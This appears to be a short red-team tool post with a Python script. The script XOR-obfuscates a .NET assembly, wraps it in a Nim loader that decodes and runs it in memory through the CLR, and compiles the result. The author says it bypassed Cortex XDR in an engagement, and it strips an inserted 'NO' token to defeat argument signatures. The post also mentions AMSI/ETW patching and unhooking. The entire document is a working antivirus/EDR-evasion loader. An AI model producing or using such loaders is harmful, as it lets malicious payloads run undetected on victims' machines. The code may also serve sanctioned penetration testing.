Used in an engagement to bypass Cortex XDR (use NO to break argument signatures). Was about to add unhooking/AMSI+ETW patches, but Nimpackt came out a day after, and you can just use that instead.

nim-assembly-wrapper.py

import sys, os


nim_template = """import winim/clr
import os
import strutils



proc execute(assembly_bytes: openarray[byte], args: openarray[string])  =

  var dotnetargs = toCLRVariant(args, VT_BSTR)
  var assembly = load(assembly_bytes)
  assembly.EntryPoint.Invoke(nil, toCLRVariant([dotnetargs]))


VARBYTES

var xorbyte: uint8 = 0xfa
for i in 0..<len(ass):
  ass[i] = cast[uint8](ass[i]) xor xorbyte
var args = commandLineParams()
for i in 0..len(args)-1:
  args[i] = replace(args[i], "NO", "")

execute(ass, args)
"""
if len(sys.argv) != 3:
	print("usage: build-decorator.py <assembly path> <new name>")

with open(sys.argv[1], "rb") as f:
	ass_bytes = f.read()


ass_bytes_obf = []
for i in range(len(ass_bytes)):
	ass_bytes_obf.append(ass_bytes[i] ^ 0xfa)

bytes_template = "var ass: array[{}, byte] = [byte {}]"

ass_nimarray = ""
for i in ass_bytes_obf:
	ass_nimarray += "{0:#04x}, ".format(i)

nim_code = nim_template.replace("VARBYTES", bytes_template.format(len(ass_bytes), ass_nimarray[:-2]))

new_name = sys.argv[1][:-4]+"_nim."
with open(new_name + "nim", "w") as f:
	f.write(nim_code)


os.system("nim c -d=mingw --app=console --cpu=amd64 {}nim".format(new_name))